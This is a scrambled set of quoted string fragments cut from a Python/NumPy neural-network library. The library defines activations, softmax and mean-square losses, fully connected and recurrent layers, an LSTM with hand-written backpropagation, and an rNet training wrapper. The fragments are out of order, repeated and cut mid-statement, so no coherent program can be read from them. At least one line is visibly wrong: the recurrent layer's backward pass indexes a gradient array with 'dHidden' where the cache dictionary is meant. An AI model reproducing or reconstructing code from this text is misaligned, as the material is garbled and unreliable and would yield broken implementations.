input): return input * (1 - input)", "shape, activation=identity()): self.shape = shape self.activation = activation def init(self, scale=1): self.weights =", "input * input class sigmoid: def __call__(self, input): return 1 / (1 +", "None self.cell = None def reset(self): self.previous = None self.cell = None def", "def __call__(self, input): return input def d(self, input): return 1 class mean_square: def", "be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None previous =", "2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous = (cell[t", "def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations", "1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0", "return tmp_ class rNet: layers = [] num_of_layers = None def __init__(self): self.num_of_layers", "activations[t, :, 0:3 * self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t, :,", "FC: ''' Fully Connected layer ''' shape = None weights = None activation", "and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot", "outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self,", "= out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0, time_steps)):", "dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] +=", "cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache,", "1]) if t > 0 else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2", "1] if t > 0 else c0 inputs[t, :, -1] = 1 inputs[t,", "outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape)", "= shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1,", "__call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous =", "to softmax_loss function ''' return 1 class softmax_loss: ''' To be used in", "if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t in range(0, time_steps):", "used in combination with sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on])", "0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0,", "1, as the derivative is covered by a previous call to softmax_loss function", "for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class", "= None previous = None cell = None def __init__(self, shape): self.shape =", "''' To be used in combination with sofmax ''' def __call__(self, input, train_on):", "precisely the matrix product dW=x.T*dY where x holds x_i as its rows and", "dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous", "np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH =", "'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs']", "self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t in range(0,", "np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy()", "self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t, :, 0:3", "out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0':", "forget_bias_init self.previous = None self.cell = None def reset(self): self.previous = None self.cell", "1 / (1 + np.exp(-input)) def d(self, input): return input * (1 -", "= None previous = None activation = None def __init__(self, shape, activation=identity()): self.shape", "inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t, :, -1] = 1 raws[t]", "self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations =", "np.size(input_1) class softmax: ''' Only to be used as the last non-recursive layer", "np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps,", "= [None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache =", "= 0 def reset(self): self.previous = None def __call__(self, input_tensor): out, cache =", "= dH[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over the", "d(self, probs, train_on=None): ''' it computes the softmax loss derivative for optimality '''", "t in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the following line", "+= (1 - cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3 *", "input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2): return", "> 0 else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] =", "np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :] = 0 def reset(self): self.previous", "dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY where x holds x_i as", "'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn':", "np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is not", "be a single input and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY -> *", "self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def", "self.weights[-1, :] = 0 def reset(self): self.previous = None def __call__(self, input_tensor): out,", "def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt(", "Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product", "desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY", "return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def", ":, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :, 2 *", "''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet: layers", "i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy'", "* self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t, :,", "(input_1 - input_2) / np.size(input_1) class softmax: ''' Only to be used as", "batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1])", "if cache0[l]['c0'] is not None and cache0[l]['h0'] is not None: out, cache[l] =", "columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t]", "single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product Now, we", "[None] * self.num_of_layers() out = inputs for l in range(0, self.num_of_layers()): if cache0", "(1 - cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]]", "as the last non-recursive layer ''' def __call__(self, input): shifted_ = input -", "in cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else None} time_steps,", "{ 'c0': cache[l]['cn'] if 'cn' in cache[l] else None, 'h0': cache[l]['hn'] if 'hn'", "''' it returns 1, as the derivative is covered by a previous call", "next_grad.copy() if dCache is not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for", "self.shape[1]]) dH = next_grad.copy() if dCache is not None: dCell[-1] += dCache['dCell'] dH[-1]", "shape = None weights = None previous = None activation = None def", "Memory layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights", "return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None):", "recursive layer ''' shape = None weights = None previous = None activation", "cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if", "the entire batch proof: Let x be a single input and dY a", "the dot product Now, we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our", "rank 3 tensor ''' out = input for l in self.layers: out =", "- input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 - input_2)", "0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0}", "dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1]", "> 0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden':", "'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None,", "outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs,", "in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the following line sums", "/ (1. + np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:] =", "range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t, :, -1] =", "dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if", "activation = None def reset(self): pass def __init__(self, shape, activation=identity()): self.shape = shape", "h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0):", "be used as the last non-recursive layer ''' def __call__(self, input): shifted_ =", "= input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :,", "self.previous = None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous =", ":, 3 * self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:] **", "dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def save(self, path): for", ":, 0:self.shape[0]] dh = dH[t - 1] if t > 0 else dh0", "2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) /", "def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch,", "not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t in reversed(range(0, time_steps)):", "activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t]", "return dW, dIn, None class FCr: ''' Fully Connected recursive layer ''' shape", "dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh", "''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): '''", "= np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape", "__call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it computes", "loss=0 for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t],", "= None self.cell = None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell,", "over the entire batch proof: Let x be a single input and dY", "outputs} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps,", "(x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n", "* activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t,", ":, 0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t,", "0:-1] return dW, dIn, None class FCr: ''' Fully Connected recursive layer '''", "scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] +", ":, 0:3 * self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3", "= inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs,", "self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 *", "self.previous = None self.cell = None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor,", "3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell +", "out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if 'cn' in cache[l]", "__call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, batch,", "and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] =", "(cell[t - 1], dCell[t - 1]) if t > 0 else (c0, dc0)", "* self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3", "* activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0", "activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is None: c0 =", "last non-recursive layer ''' def __call__(self, input): shifted_ = input - np.max(input) exp_", "''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]]", "mask_start=0): time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1]", "self.num_of_layers = lambda: len(self.layers) def __call__(self, input): ''' input is to be a", "input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]])", "self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:] ** 2) ''' the", "np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet: layers = [] num_of_layers", "__call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def", "return (input_1 - input_2) / np.size(input_1) class softmax: ''' Only to be used", "cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn']", "'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs =", "self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch,", "class FCr: ''' Fully Connected recursive layer ''' shape = None weights =", "def init(self): for l in self.layers: l.init() def reset(self): for l in self.layers:", "None def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def init(self,", "dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] *", "and dY holds dY_i as its rows In other words, a product of", "call to softmax_loss function ''' return 1 class softmax_loss: ''' To be used", "Only to be used as the last non-recursive layer ''' def __call__(self, input):", "for t in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t,", "3 tensor ''' out = input for l in self.layers: out = l(out)", "h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous", "is not None and cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0'])", "+= dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM: ''' Long", "class tanh: def __call__(self, input): return np.tanh(input) def d(self, input): return 1 -", "a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product Now,", "time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights)", "l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache =", "not None and cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif", "* self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3", "np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps):", "/ 2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 - input_2) / np.size(input_1)", "np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch,", "]) activations[t, :, 0:3 * self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3", "input) class identity: def __call__(self, input): return input def d(self, input): return 1", "3 * self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:] =", "cache0 is not None and cache0[l] is not None: if cache0[l]['c0'] is not", "we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n", "loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers() for l in", "input, c0=None, h0=None, mask_start=0): time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps, batch,", ":, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM: ''' Long Short Term", "input def d(self, input): return 1 class mean_square: def __call__(self, input_1, input_2): return", "self.activation.d(outputs[t]) ''' the following line sums the gradients over the entire batch proof:", "gradients over the entire batch proof: Let x be a single input and", "self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch,", "return 1 / (1 + np.exp(-input)) def d(self, input): return input * (1", "self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM: ''' Long Short Term Memory", "import numpy as np class tanh: def __call__(self, input): return np.tanh(input) def d(self,", "''' Fully Connected layer ''' shape = None weights = None activation =", "self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3 *", "0 else h0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t]", "previous = None activation = None def __init__(self, shape, activation=identity()): self.shape = shape", "matrices is a sum of tensor products of columns and rows of the", "function ''' return 1 class softmax_loss: ''' To be used in combination with", ":, -1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] =", "= np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is", "self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations,", "# dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous +=", "outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps,", "dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] *", "* self.shape[1]] = forget_bias_init self.previous = None self.cell = None def reset(self): self.previous", "np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class", "dH[-1] += dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t]", "def d(self, probs, train_on=None): ''' it computes the softmax loss derivative for optimality", "self.shape[1]]) for t in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :]", "raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs =", "init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1])", "outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput =", "input): return 1 class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2)", "tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet: layers = [] num_of_layers =", "self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3 *", "class FC: ''' Fully Connected layer ''' shape = None weights = None", "batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is not", "None weights = None previous = None cell = None def __init__(self, shape):", ":, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs':", "self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None)", "C_previous, dC_previous = (cell[t - 1], dCell[t - 1]) if t > 0", "dAct = dOut[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over", "''' the following line sums the gradients over the entire batch proof: Let", "''' out = input for l in self.layers: out = l(out) return out", "0 def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor):", "time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs", "input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] +", "cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not", "return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it returns", "def reset(self): for l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self,", "in combination with sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def", "out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l]", "mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def", "input): ''' input is to be a rank 3 tensor ''' out =", "+ self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self, input_tensor): out, _ =", "= np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for t in range(0,", "return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, in_ = input.shape", "__call__(self, input): return input def d(self, input): return 1 class mean_square: def __call__(self,", "def __call__(self, input): shifted_ = input - np.max(input) exp_ = np.exp(shifted_) return exp_", "class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True)", "= np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous = outputs[t - 1]", "identity: def __call__(self, input): return input def d(self, input): return 1 class mean_square:", "np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous = outputs[t - 1] if", "dIn, None class FCr: ''' Fully Connected recursive layer ''' shape = None", "= np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is None: c0 = np.zeros([batch,", "else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = {", "self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2 *", "2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t] # dout", "self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells,", "cells[t - 1] if t > 0 else c0 inputs[t, :, -1] =", "inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 *", "scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) *", "out = inputs for l in range(0, self.num_of_layers()): if cache0 is not None", "of tensor products of columns and rows of the respected matrices ''' dW", "def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous", "following line sums the gradients over the entire batch proof: Let x be", "in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps,", "columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t]", "4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if", "4 * self.shape[1]]) if c0 is None: c0 = np.zeros([batch, self.shape[1]]) if h0", "= None activation = None def reset(self): pass def __init__(self, shape, activation=identity()): self.shape", "= None self.cell = None def reset(self): self.previous = None self.cell = None", "t > 0 else c0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]]", "dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t, :,", "= np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, in_", "batch, out_ = out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for t in", "cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None):", "self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t, :, 3 *", "= np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] *", "return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it computes the softmax loss", "= C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t]", "class rNet: layers = [] num_of_layers = None def __init__(self): self.num_of_layers = lambda:", "def load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC:", "np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0 is None: h0", "* self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :,", "eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps,", "= None def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input): ''' input", "t in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t, :,", "def d(self, input_1, input_2): return (input_1 - input_2) / np.size(input_1) class softmax: '''", "time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_", "previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws,", "= cache['activations'] cell_act = cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps, batch,", "= dOut.copy() if dCache is not None: dH[-1] += np.copy(dH['dHidden']) for t in", "- 1] if t > 0 else dh0 dh += dInput[t, :, self.shape[0]:-1]", ":, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs':", "* self.num_of_layers() cache_out = [None] * self.num_of_layers() out = inputs for l in", "gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product Now, we have", "def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None]", "return 1 - input * input class sigmoid: def __call__(self, input): return 1", "= np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch,", "previous = None cell = None def __init__(self, shape): self.shape = shape def", "in cache[l] else None} time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps, batch,", "outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, in_ = input.shape inputs", "the softmax loss derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -=", "softmax loss derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1", "outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for t in", "dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] # activations", "''' shape = None weights = None previous = None cell = None", "the gradients over the entire batch proof: Let x be a single input", "batch proof: Let x be a single input and dY a single gradient", "layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers()", "self.shape[1]] * dH[t] # dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] =", "time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] +", "= [None] * self.num_of_layers() cache_out = [None] * self.num_of_layers() out = inputs for", "None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else None} time_steps, batch, out_ =", "activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) /", "inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1]", "proof: Let x be a single input and dY a single gradient Than", "0:3 * self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3 *", "* self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :, 3", "elif cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l]", "Fully Connected layer ''' shape = None weights = None activation = None", "input_tensor): out, cache = 